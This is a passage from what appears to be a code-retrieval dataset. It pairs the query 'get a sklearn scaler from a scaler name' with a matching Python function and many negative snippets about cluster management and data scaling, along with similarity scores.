Dict[str, Optional[str]] = {} # Validation clusters and labels\n self._centroids: Dict[str, np.ndarray] = {} # Cache for the cluster centroids\n \n # Load previously known clusters, if exists\n self.load()", "def get_cluster_name(admin_socket):\n\n m = ADMIN_SOCKET_PATTERN.match(admin_socket)\n name = None\n if m:\n name = m.group(1)\n return name", "def _create_cluster_from_index(self, index):\n return VRPCluster(index=index, demand=self.demands[index])", "def cluster_create():\n logger.info(\"/cluster action=\" + r.method)\n request_debug(r, logger)\n if not r.form[\"name\"] or not r.form[\"host_id\"] or not \\\n r.form[\"consensus_plugin\"] or not r.form[\"size\"]:\n logger.warning(\"cluster post without enough data\")\n response_fail[\"error\"] = \"cluster POST without enough data\"\n response_fail[\"data\"] = r.form\n return jsonify(response_fail), CODE_BAD_REQUEST\n else:\n name, host_id, consensus_plugin, consensus_mode, size = \\\n r.form['name'], r.form['host_id'], 
r.form['consensus_plugin'],\\\n r.form['consensus_mode'] or CONSENSUS_MODES[0], int(r.form[\n \"size\"])\n if consensus_plugin not in CONSENSUS_PLUGINS:\n logger.debug(\"Unknown consensus_plugin={}\".format(\n consensus_plugin))\n return jsonify(response_fail), CODE_BAD_REQUEST\n if consensus_plugin != CONSENSUS_PLUGINS[0] and consensus_mode \\\n not in CONSENSUS_MODES:\n logger.debug(\"Invalid consensus, plugin={}, mode={}\".format(\n consensus_plugin, consensus_mode))\n return jsonify(response_fail), CODE_BAD_REQUEST\n\n if size not in CLUSTER_SIZES:\n logger.debug(\"Unknown cluster size={}\".format(size))\n return jsonify(response_fail), CODE_BAD_REQUEST\n if cluster_handler.create(name=name, host_id=host_id,\n consensus_plugin=consensus_plugin,\n consensus_mode=consensus_mode,\n size=size):\n logger.debug(\"cluster POST successfully\")\n return jsonify(response_ok), CODE_CREATED\n else:\n logger.debug(\"cluster creation failed\")\n response_fail[\"error\"] = \"Failed to create cluster {}\".format(\n name)\n return jsonify(response_fail), CODE_BAD_REQUEST", "def __init__(\n self,\n clustering_algorithm,\n n_clusters: int,\n cluster_args: dict,\n checkpoints_path: str,\n batch_size: int = 1024,\n is_batched: bool = False):\n super().__init__()\n self.clustering_algorithm = clustering_algorithm\n self.n_clusters = n_clusters\n self.batch_size = batch_size\n self.cluster_args = cluster_args\n self.checkpoints_path = checkpoints_path\n self.is_batched = is_batched", "def parse_cluster(\n fasta_path, file_dict=None, file_writer=None, neighbor_joining=False\n):\n cluster_id = fasta_path.name[:-3]\n outdir = fasta_path.parent\n clusters = parse_cluster_fasta(fasta_path)\n if len(clusters) < 2:\n # fasta_path.unlink()\n logger.error(f\"Singleton Cluster {cluster_id} is size {len(clusters)}\")\n cluster_dict = {\n \"size\": len(clusters),\n \"n_memb\": None,\n \"n_members\": None,\n \"n_adj\": None,\n \"adj_groups\": None,\n }\n return int(cluster_id)\n # calculate MSA and return guide tree\n muscle_args = [\n \"-in\",\n f\"{outdir}/{cluster_id}.fa\",\n \"-out\",\n f\"{outdir}/{cluster_id}.faa\",\n \"-diags\",\n \"-sv\",\n \"-maxiters\",\n \"2\",\n \"-quiet\",\n \"-distance1\",\n \"kmer20_4\",\n ]\n if len(clusters) >= 4:\n muscle_args += [\n \"-tree2\",\n f\"{outdir}/{cluster_id}.nwk\",\n ]\n if neighbor_joining:\n muscle_args += [\"-cluster2\", \"neighborjoining\"] # adds 20%\n try:\n muscle = sh.Command(\"muscle\", search_paths=SEARCH_PATHS)\n except sh.CommandNotFound:\n logger.error(\"muscle must be installed first.\")\n sys.exit(1)\n muscle(muscle_args)\n # fasta_path.unlink()\n clusters[\"prot.idx\"] = clusters[\"path\"].map(file_dict)\n clusters.sort_values(by=[\"prot.idx\", \"frag.id\", \"frag.pos\"], inplace=True)\n n_adj, adj_gr_count, unused_adj_group = calculate_adjacency_group(\n clusters[\"frag.pos\"], clusters[\"frag.idx\"]\n )\n idx_values = clusters[\"prot.idx\"].value_counts()\n idx_list = list(idx_values.index)\n idx_list.sort()\n write_tsv_or_parquet(clusters, outdir / f\"{cluster_id}.{CLUSTER_FILETYPE}\")\n cluster_dict = {\n \"size\": len(clusters),\n \"n_memb\": len(idx_values),\n \"n_members\": str(idx_list),\n \"n_adj\": n_adj,\n \"adj_groups\": adj_gr_count,\n }\n for group_id, subframe in clusters.groupby(by=[\"prot.idx\"]):\n proteome_frame = subframe.copy()\n proteome_frame[\"hom.cluster\"] = cluster_id\n proteome_frame[\"hom.cl_size\"] = len(idx_values)\n proteome_frame.drop(\n proteome_frame.columns.drop(HOMOLOGY_COLS), # drop EXCEPT these\n axis=1,\n 
inplace=True,\n )\n with file_writer(group_id) as file_handle:\n proteome_frame.to_csv(file_handle, header=False, sep=\"\\t\")\n return int(cluster_id), cluster_dict", "def extract_clusters(self, dictionary=None, autorenaming_option=True):\n cluster_list = self.__dendrogram._extract_clusters_by_color()\n return cluster_list if autorenaming_option is False else self.__autorename_clusters(cluster_list, dictionary, 5)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"auto_renew\"] = auto_renew\n __props__.__dict__[\"auto_renew_period\"] = auto_renew_period\n __props__.__dict__[\"cluster_name\"] = cluster_name\n __props__.__dict__[\"data_center_name\"] = data_center_name\n __props__.__dict__[\"disk_size\"] = disk_size\n __props__.__dict__[\"disk_type\"] = disk_type\n __props__.__dict__[\"enable_public\"] = enable_public\n __props__.__dict__[\"instance_type\"] = instance_type\n __props__.__dict__[\"ip_white\"] = ip_white\n __props__.__dict__[\"maintain_end_time\"] = maintain_end_time\n __props__.__dict__[\"maintain_start_time\"] = maintain_start_time\n __props__.__dict__[\"major_version\"] = major_version\n __props__.__dict__[\"node_count\"] = node_count\n __props__.__dict__[\"password\"] = password\n __props__.__dict__[\"pay_type\"] = pay_type\n __props__.__dict__[\"period\"] = period\n __props__.__dict__[\"period_unit\"] = period_unit\n __props__.__dict__[\"public_points\"] = public_points\n __props__.__dict__[\"security_groups\"] = security_groups\n __props__.__dict__[\"status\"] = status\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"vswitch_id\"] = vswitch_id\n __props__.__dict__[\"zone_id\"] = zone_id\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def _load_cluster(self):", "def resource_type(self):\n return 'cluster'", "def cluster_start(r):\n cluster_id = request_get(r, \"cluster_id\")\n if not cluster_id:\n logger.warning(\"No cluster_id is given\")\n return make_fail_response(\"No cluster_id is given\")\n if cluster_handler.start(cluster_id):\n return jsonify(response_ok), CODE_OK\n\n return make_fail_response(\"cluster 
start failed\")", "def run_cluster(autoscaling: bool = False, **options) -> None:\n if autoscaling:\n thread = AutoScalingCluster.new(**options)\n else:\n thread = RemoteCluster.new(**options)\n try:\n thread.join()\n except Exception:\n thread.stop()\n raise", "def cluster_hierarchically(active_sites):\n\n\n cls, sc = agglomerative(active_sites)\n\n return cls", "def calrissian_make_tool(spec, loadingContext):\n if \"class\" in spec and spec[\"class\"] == \"CommandLineTool\":\n return CalrissianCommandLineTool(spec, loadingContext)\n else:\n return default_make_tool(spec, loadingContext)", "def create_cluster(\n self,\n name: str,\n cluster_type: Union[dto.ClusterType, str],\n params: Mapping[str, Any],\n ssh_key: str\n ) -> dto.Cluster:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def create_coe_cluster(\n self,\n name,\n cluster_template_id,\n **kwargs,\n ):\n cluster = self.container_infrastructure_management.create_cluster(\n name=name,\n cluster_template_id=cluster_template_id,\n **kwargs,\n )\n\n self.list_coe_clusters.invalidate(self)\n return cluster", "def init_cluster(\n self,\n node_name,\n ):\n # Gets the node IP address.\n ip = self.get_node_ip(node_name)\n\n # Initializes the swarm.\n docker_utils.swarm_init(\n hostname=ip,\n ssh_port=SSH_PORT,\n ssh_username=self.get_ssh_username(node_name),\n ssh_private_key_file=self.get_ssh_private_key_file(node_name),\n executor=node_name,\n logger=self._logger,\n )", "def get_cluster_from_string(cluster, running_clusters=None):\n # no running clusters given -> get them now\n if not running_clusters:\n running_clusters = util.get_cluster_specs()\n\n # json file (get spec)\n if re.search(r'\\.json$', cluster):\n cluster = Cluster(running_clusters=running_clusters, file=cluster, **util.read_json_spec(cluster, \"clusters\"))\n # cluster name (cluster must already exists in cloud)\n else:\n cluster_name = re.sub(r'_', '-', cluster)\n if cluster_name in running_clusters:\n cluster = Cluster(running_clusters=running_clusters, **running_clusters[cluster_name])\n else:\n raise util.TFCliError(\"ERROR: Given cluster {} not found in cloud!\".format(cluster_name))\n return cluster", "def lookup_cluster_by_name(cluster_name):\n cluster_root = get_cluster_root()\n if not cluster_root:\n print('Cannot get the root of the linked list of clusters')\n return\n cluster = None\n\n # lookup for the task associated with the id\n if cluster_root['cluster_']['name'].string() == cluster_name:\n cluster = cluster_root['cluster_'].address\n else:\n curr = cluster_root\n while True:\n curr = curr['next'].cast(uClusterDL_ptr_type)\n\n if curr['cluster_']['name'].string() == cluster_name:\n cluster = curr['cluster_'].address\n break\n\n if curr == cluster_root:\n break\n\n if not cluster:\n print(\n (\"Cannot find a cluster with the name: {}.\".format(cluster_name))\n )\n return cluster", "def cluster_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"cluster_name\")", "def create_redshift_cluster(redshift_client, role_arn):\n # Create the cluster if it doesn't exist.\n try:\n response = redshift_client.create_cluster(\n ClusterType=CLUSTER_TYPE,\n NodeType=NODE_TYPE,\n NumberOfNodes=NUM_NODES,\n DBName=DBNAME,\n ClusterIdentifier=IDENTIFIER,\n MasterUsername=USER,\n MasterUserPassword=PASSWORD,\n IamRoles=[role_arn]\n )\n except Exception as e:\n print(e)", "def get_cluster(self, profile):\n if self._value.has_option(profile, 'cluster'):\n if 
self._value.has_option(profile, 'cluster'):\n cluster = self._value.get(profile, 'cluster')\n self.logger.info(\"Connecting to: %s cluster\" % cluster)\n else:\n self.logger.error(\n \"No cluster parameter found\"\n )\n exit(1)\n else:\n self.logger.error(\n \"No profile found. Please define a default profile, \\\n or specify a named profile using `--profile`\"\n )\n exit(1)\n return cluster", "def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")", "def _cluster_name(index):\n if index < 26: return chr(97+index)\n else: return 'a'+chr(71+index)", "def getBestCluster():\r\n global bestCluster\r\n return bestCluster", "def running_cluster(request):\n cluster_name = 'running-cluster-' + random_string()\n launch_cluster(\n cluster_name=cluster_name,\n instance_type=request.param.instance_type,\n spark_version=request.param.spark_version,\n spark_git_commit=request.param.spark_git_commit)\n\n if request.param.restarted:\n stop_cluster(cluster_name)\n start_cluster(cluster_name)\n\n def destroy():\n p = subprocess.run([\n 'flintrock', 'destroy', cluster_name, '--assume-yes'])\n assert p.returncode == 0\n request.addfinalizer(destroy)\n\n return cluster_name", "def factory(args, cxn, log):\n name = args['assembler'].lower()\n assembler = ASSEMBLERS[name]\n return assembler(args, cxn, log)" ]
[ "0.5950856", "0.58060235", "0.5799281", "0.5795873", "0.5752199", "0.56631964", "0.55473256", "0.5533583", "0.5423363", "0.54131496", "0.53921217", "0.53843373", "0.53843373", "0.53843373", "0.5361153", "0.5359831", "0.53507227", "0.53416944", "0.5282299", "0.5266684", "0.526383", "0.52311033", "0.5228705", "0.52240753", "0.5216106", "0.51854485", "0.51847214", "0.5178425", "0.5169556", "0.5166051", "0.51647127", "0.51647127", "0.5158469", "0.5144696", "0.51275545", "0.5099692", "0.50876594", "0.50755626", "0.5070397", "0.50584537", "0.50469184", "0.5044523", "0.50431645", "0.5034745", "0.50037694", "0.49824303", "0.4973812", "0.49709788", "0.49709788", "0.49709788", "0.49709788", "0.49709788", "0.49695897", "0.4969097", "0.4968818", "0.49603143", "0.4957749", "0.495271", "0.4952464", "0.49488536", "0.49419105", "0.4940304", "0.4939434", "0.49280274", "0.49253702", "0.49247742", "0.49226195", "0.49194226", "0.4913093", "0.491292", "0.48933262", "0.4889577", "0.48847717", "0.4878126", "0.48779035", "0.48744586", "0.48709717", "0.4870932", "0.48585367", "0.48454052", "0.48378393", "0.48369476", "0.4830175", "0.4825441", "0.48175547", "0.48131913", "0.48082173", "0.47993258", "0.47929946", "0.47926193", "0.479107", "0.47897485", "0.47892463", "0.4780808", "0.4776917", "0.4776917", "0.47716695", "0.4762777", "0.47535342", "0.47469229" ]
0.7380628
0
get a sklearn scaler from a scaler name
def get_scaler(scaler):
    if scaler == 'standard':
        from sklearn.preprocessing import StandardScaler
        return StandardScaler()
    if scaler == 'minmax':
        from sklearn.preprocessing import MinMaxScaler
        return MinMaxScaler()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __create_scaler_type(self):\n\n if self.scalertype == \"standard\":\n return StandardScaler()\n if self.scalertype == \"minmax\":\n return MinMaxScaler(feature_range=self.featureRange)\n assert True, \"An error occured when creating a scaler of type '{}'\".format(self.scalertype)", "def get_normalizer(data):\n scaler = StandardScaler().fit(data)\n return scaler", "def _load_scaler(self, scaler_file):\n assert isinstance(scaler_file, str),\\\n \"scaler_file not entered as string.\"\n self.scaler = joblib.load(file_path(scaler_file))\n return", "def from_name(cls: Type[AutoScalerPolicy], name: str) -> AutoScalerPolicy:\n try:\n return cls[name.upper()]\n except KeyError:\n raise RuntimeError(f'Unknown {cls.__name__} \\'{name}\\'')", "def any_preprocessing(name):\n return hp.choice('%s' % name, [\n [pca(name + '.pca')],\n [standard_scaler(name + '.standard_scaler')],\n [min_max_scaler(name + '.min_max_scaler')],\n [normalizer(name + '.normalizer')],\n # -- not putting in one-hot because it can make vectors huge\n #[one_hot_encoder(name + '.one_hot_encoder')],\n []\n ])", "def test_scaler_attribute_type(self, scaler, scaler_type):\n\n x = ScalingTransformer(columns=\"b\", scaler=scaler)\n\n assert (\n type(x.scaler) is scaler_type\n ), f\"unexpected scaler set in init for {scaler}\"", "def get_norm(name):\n if name in _metrics.keys():\n return _metrics[name]\n raise ValueError(\"Name '{}' does not stand for any known norm\", name)", "def get_clf_and_scaler(data_path, pickle_file='./data/classifier.p'):\n clf, scaler = load_model(pickle_file)\n if clf == None:\n clf, scaler = train_classifier(data_path)\n save_model(clf, scaler, pickle_file)\n\n return clf, scaler", "def compute_scaler(args):\n workspace = args.workspace\n data_type = args.data_type\n dir_name = args.dir_name \n # Load data. \n t1 = time.time()\n hdf5_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, dir_name, \"data.h5\")\n with h5py.File(hdf5_path, 'r') as hf:\n x = hf.get('x') \n x = np.array(x) # (n_segs, n_concat, n_freq)\n \n # Compute scaler. \n (n_segs, n_concat, n_freq) = x.shape\n x2d = x.reshape((n_segs * n_concat, n_freq))\n scaler = preprocessing.StandardScaler(with_mean=True, with_std=True).fit(x2d)\n print(scaler.mean_)\n print(scaler.scale_)\n \n # Write out scaler. \n out_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, dir_name, \"scaler.p\")\n create_folder(os.path.dirname(out_path))\n pickle.dump(scaler, open(out_path, 'wb'))\n \n print(\"Save scaler to %s\" % out_path)\n print(\"Compute scaler finished! %s s\" % (time.time() - t1,))", "def train_scaler(dset, varname=None, row_dim='time', transform=True):\n \n try: \n from dask_ml.preprocessing import StandardScaler\n except: \n from sklearn.preprocessing import StandardScaler\n \n dset = dset[varname]\n space_dims = tuple(x for x in dset.dims if x != row_dim)\n dset_stack = dset.stack(z=space_dims) \n scaler = StandardScaler()\n if transform: \n data_std = scaler.fit_transform(dset_stack.data)\n dset_stack.data = data_std\n dset = dset_stack.unstack()\n return dset, scaler\n else:\n return None, scaler", "def compute_scaler(data_type):\n workspace = config.workspace\n\n if data_type == 'train':\n snr = config.Tr_SNR\n \n # Load data. 
\n t1 = time.time()\n hdf5_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, \"%ddb\" % int(snr), \"data.h5\")\n with h5py.File(hdf5_path, 'r') as hf:\n x = hf.get('x') \n x = np.array(x) # (n_segs, n_concat, n_freq)\n \n # Compute scaler. \n (n_segs, n_concat, n_freq) = x.shape\n x2d = x.reshape((n_segs * n_concat, n_freq))\n scaler = StandardScaler(with_mean=True, with_std=True).fit(x2d)\n# print(scaler.mean_)\n# print(scaler.scale_)\n \n # Write out scaler. \n out_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, \"%ddb\" % int(snr), \"scaler.p\")\n create_folder(os.path.dirname(out_path))\n pickle.dump(scaler, open(out_path, 'wb'))\n \n print(\"Save scaler to %s\" % out_path)\n print(\"Compute scaler finished! %s s\" % (time.time() - t1,))", "def get_sklearn_model(x):\n if is_sklearn_model(x):\n return x # already a valid model\n elif type(x) is dict:\n if hasattr(x, 'model'):\n return get_sklearn_model(x['model'])\n else:\n return None\n elif type(x) is str:\n # noinspection PyBroadException\n try:\n return get_sklearn_model(eval(x))\n except:\n pass\n return None", "def _scaling_model_from_dict(obj):\n for entry_point in pkg_resources.iter_entry_points(\"dxtbx.scaling_model_ext\"):\n if entry_point.name == obj[\"__id__\"]:\n return entry_point.load().from_dict(obj)", "def build_scale_controller(name: str, kwargs=None) -> Union[ScaleControllerBase, None]:\n if not name or name == 'none':\n return None\n controller_choices = {\n 'learn': LearnableScaleController,\n 'fix': FixedScaleController,\n 'relu': ReluScaleController,\n 'exp': ExpScaleController,\n 'softmax': SoftmaxScaleController,\n 'norm': NormalizeScaleController,\n }\n if name not in controller_choices:\n raise KeyError('Wrong scale controller name.')\n controller_type = controller_choices[name]\n return controller_type(**kwargs) if kwargs else controller_type()", "def set_scalers(self, df):\n print_info('Setting scalers with training data...')\n\n column_definitions = self.getcolumn_definition()\n id_column = get_single_col_by_input_type(InputTypes.ID, column_definitions)\n target_column = get_single_col_by_input_type(InputTypes.TARGET, column_definitions)\n\n # Format real scalers\n real_inputs = extract_cols_from_data_type(\n DataTypes.REAL_VALUED, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n # Initialise scaler caches\n self.real_scalers = {}\n self.target_scaler = {}\n identifiers = []\n for identifier, sliced in df.groupby(id_column):\n\n if len(sliced) >= self._time_steps:\n\n data = sliced[real_inputs].values\n targets = sliced[[target_column]].values\n self.real_scalers[identifier] = sk_preprocessing.StandardScaler().fit(data)\n self.target_scaler[identifier] = sk_preprocessing.StandardScaler().fit(targets)\n identifiers.append(identifier)\n\n # Format categorical scalers\n categorical_inputs = extract_cols_from_data_type(\n DataTypes.CATEGORICAL, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n categorical_scalers = {}\n num_classes = []\n for col in categorical_inputs:\n # Set all to str so that we don't have mixed integer/string columns\n srs = df[col].apply(str)\n categorical_scalers[col] = sk_preprocessing.LabelEncoder().fit(srs.values)\n num_classes.append(srs.nunique())\n\n # Set categorical scaler outputs\n self._cat_scalers = categorical_scalers\n self._num_classes_per_cat_input = num_classes\n\n # Extract identifiers in case required\n self.identifiers = identifiers", "def load_X_scaler(self, out_tag='lstm_scaler'): \n\n 
print ('loading X scaler: models/{}_X_scaler.pkl'.format(out_tag))\n self.X_scaler = load(open('models/{}_X_scaler.pkl'.format(out_tag),'rb'))", "def __create_scaler(self):\n \n self.scaler = {}\n for component in self.comp_list:\n self.scaler[component] = self.__create_scaler_type()", "def scale_data(x: np.ndarray, scaler=None) -> Tuple[np.ndarray, object]:\n original_shape = x.shape\n\n # reshape data to 2d array\n x = x.reshape((x.shape[0], -1))\n\n if scaler is None:\n scaler = StandardScaler().fit(x)\n\n x = scaler.transform(x)\n\n # reshape back\n x = x.reshape(original_shape)\n return x, scaler", "def _get_classifier_to_name(self, classifier_name: str) -> object:\n\n classifiers = all_estimators('classifier')\n clf_class = [clf[1] for clf in classifiers if clf[0] == classifier_name]\n\n if clf_class:\n return clf_class[0]()\n \n else:\n msg = f'The passed classifier name \\'{classifier_name}\\' has no corresponding classifier, please make sure that the passed name corresponds to an actual sklearn classifier.'\n raise NameError(msg)", "def get_X_scaler(self, X_train, out_tag='lstm_scaler', save=True):\n\n X_scaler = StandardScaler()\n X_scaler.fit(X_train.values)\n self.X_scaler = X_scaler\n if save:\n print('saving X scaler: models/{}_X_scaler.pkl'.format(out_tag))\n dump(X_scaler, open('models/{}_X_scaler.pkl'.format(out_tag),'wb'))", "def test_scaler_initialised_with_scaler_kwargs(\n self, mocker, scaler, scaler_type_str, scaler_kwargs_value\n ):\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.__init__\", return_value=None\n )\n\n ScalingTransformer(\n columns=\"b\", scaler=scaler, scaler_kwargs=scaler_kwargs_value\n )\n\n assert mocked.call_count == 1, \"unexpected number of calls to init\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n assert (\n call_pos_args == ()\n ), f\"unexpected positional args in {scaler_type_str} init call\"\n\n assert (\n call_kwargs == scaler_kwargs_value\n ), f\"unexpected kwargs in {scaler_type_str} init call\"", "def from_config(cls, config: dict):\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n _scaler_config = config['config'].pop('scaler_to_standardize_')\n setattr(scaler, '_scaler', StandardScaler.from_config(_scaler_config))\n\n rescaler = config['config'].pop('rescaler_config_')\n if rescaler:\n setattr(scaler, 'rescaler_', MinMaxScaler.from_config(rescaler))\n else:\n setattr(scaler, 'rescaler_', None)\n\n pre_standardizer = config['config'].pop('pre_center_config_')\n if pre_standardizer:\n setattr(scaler, 'pre_centerer_', Center.from_config(pre_standardizer))\n else:\n setattr(scaler, 'pre_centerer_', None)\n\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n\n if isinstance(scaler.lambdas_, float):\n scaler.lambdas_ = [scaler.lambdas_]\n return scaler", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def set_scalers(self, df):\n print('Setting scalers with training data...')\n\n column_definitions = self.get_column_definition()\n id_column = utils.get_single_col_by_input_type(InputTypes.ID,\n column_definitions)\n target_column = utils.get_single_col_by_input_type(InputTypes.TARGET,\n column_definitions)\n\n # Extract identifiers in case required\n self.identifiers = list(df[id_column].unique())\n\n # Format real scalers\n real_inputs = utils.extract_cols_from_data_type(\n DataTypes.REAL_VALUED, 
column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n data = df[real_inputs].values\n self._real_scalers = sklearn.preprocessing.StandardScaler().fit(data)\n self._target_scaler = sklearn.preprocessing.StandardScaler().fit(\n df[[target_column]].values) # used for predictions\n\n # Format categorical scalers\n categorical_inputs = utils.extract_cols_from_data_type(\n DataTypes.CATEGORICAL, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n categorical_scalers = {}\n num_classes = []\n for col in categorical_inputs:\n # Set all to str so that we don't have mixed integer/string columns\n srs = df[col].apply(str)\n categorical_scalers[col] = sklearn.preprocessing.LabelEncoder().fit(\n srs.values)\n num_classes.append(srs.nunique())\n\n # Set categorical scaler outputs\n self._cat_scalers = categorical_scalers\n self._num_classes_per_cat_input = num_classes", "def scaled_component(self, key):\n\n if key in self.components:\n dat = self.components[key] \n # Aliases\n elif key in component_from_alias:\n comp = component_from_alias[key]\n if comp in self.components:\n dat = self.components[comp] \n else:\n # Component not present, make zeros\n return np.zeros(self.shape)\n else:\n raise ValueError(f'Component not available: {key}')\n \n # Multiply by scale factor\n factor = self.factor \n \n if factor != 1:\n return factor*dat\n else:\n return dat", "def test_scaler_fit_call(self, mocker, scaler, scaler_type_str):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.fit\", return_value=None\n )\n\n x.fit(df)\n\n assert mocked.call_count == 1, \"unexpected number of calls to scaler fit\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n expected_positional_args = (df[[\"b\", \"c\"]],)\n\n h.assert_equal_dispatch(\n expected=expected_positional_args,\n actual=call_pos_args,\n msg=f\"unexpected positional args in {scaler_type_str} fit call\",\n )\n\n assert call_kwargs == {}, f\"unexpected kwargs in {scaler_type_str} fit call\"", "def get_normalization_layer(name: str, ds: tf.data.Dataset, weighted=False):\r\n # Normalization layer for the feature\r\n normalizer = tf.keras.layers.experimental.preprocessing.Normalization(axis=None)\r\n\r\n # Dataset that only yields specified feature\r\n if weighted:\r\n feature_ds = ds.map(lambda x, y, w: x[name])\r\n else:\r\n feature_ds = ds.map(lambda x, y: x[name])\r\n\r\n # Adapt the layer to the data scale\r\n normalizer.adapt(feature_ds)\r\n\r\n return normalizer", "def __init__(self) -> None:\n self.name = \"minmaxScaler\"\n self.min = 0\n self.max = 0", "def test_scaler():\n raw = io.read_raw_fif(raw_fname)\n events = read_events(event_name)\n picks = pick_types(raw.info, meg=True, stim=False, ecg=False,\n eog=False, exclude='bads')\n picks = picks[1:13:3]\n\n epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,\n baseline=(None, 0), preload=True)\n epochs_data = epochs.get_data()\n scaler = Scaler(epochs.info)\n y = epochs.events[:, -1]\n\n X = scaler.fit_transform(epochs_data, y)\n assert_true(X.shape == epochs_data.shape)\n X2 = scaler.fit(epochs_data, y).transform(epochs_data)\n assert_array_equal(X2, X)\n # these should be across time\n assert_allclose(X.std(axis=-2), 1.)\n assert_allclose(X.mean(axis=-2), 0., atol=1e-12)\n\n # Test inverse_transform\n Xi = scaler.inverse_transform(X, y)\n assert_array_almost_equal(epochs_data, 
Xi)\n\n for kwargs in [{'with_mean': False}, {'with_std': False}]:\n scaler = Scaler(epochs.info, **kwargs)\n scaler.fit(epochs_data, y)\n assert_array_almost_equal(\n X, scaler.inverse_transform(scaler.transform(X)))\n # Test init exception\n assert_raises(ValueError, scaler.fit, epochs, y)\n assert_raises(ValueError, scaler.transform, epochs, y)", "def scale_data(x, y, x_scale_f = '../saved_models/scalers/9_params_21_2_x_scaler.pkl', y_scale_f = '../saved_models/scalers/9_params_21_2_y_scaler.pkl', par_slice = range(7) + range(8,9)):\n\tx_scaler = sklearn.externals.joblib.load(x_scale_f)\n\ty_scaler = sklearn.externals.joblib.load(y_scale_f)\n\tx_scaler.transform(x)\n\ty_scaler.transform(y)\n\tx = x[:,par_slice] \n\treturn x, y, x_scaler, y_scaler", "def get_scorer(scoring):\n if isinstance(scoring, str):\n try:\n scorer = SCORERS[scoring]\n except KeyError:\n raise ValueError(\n \"%r is not a valid scoring value. \"\n \"Use sorted(sklearn.metrics.SCORERS.keys()) \"\n \"to get valid options.\" % scoring\n )\n else:\n scorer = scoring\n return scorer", "def from_config(cls, config: dict):\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n return scaler", "def denorm_it(val, scaler):\n # # inverse transform a single value\n newval = scaler.inverse_transform(val.reshape(1, -1))\n return newval", "def set_and_get_scaling_factor(c, default, warning=False, exception=False, hint=None):\n if c.is_indexed():\n raise AttributeError(\n f\"Ambiguous which scaling factor to return for indexed component {c.name}.\"\n )\n sf = get_scaling_factor(c, warning=warning, exception=exception, hint=hint)\n if sf is None:\n sf = default\n set_scaling_factor(c, sf, data_objects=False)\n return sf", "def standard_scaler(X_train, X_validate, X_test):\n\n scaler = StandardScaler().fit(X_train)\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n \n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled", "def scale_model(model,scaleparname='A',scaleval=1):\n model = get_model_instance(model)\n if scaleparname in model.params:\n scaleparname += '1'\n if isinstance(model,FunctionModel1D):\n compclass = CompositeModel1D\n else:\n compclass = CompositeModel\n res = compclass((model,'constant'),operation='*',\n parnames={'C1':scaleparname})\n setattr(res,scaleparname,scaleval)\n return res", "def get_constraint_transform_applied_scaling_factor(c, default=None):\n try:\n sf = c.parent_block().constraint_transformed_scaling_factor.get(c, default)\n except AttributeError:\n sf = default # when there is no suffix\n return sf", "def scale(train, test):\n # fit scaler\n 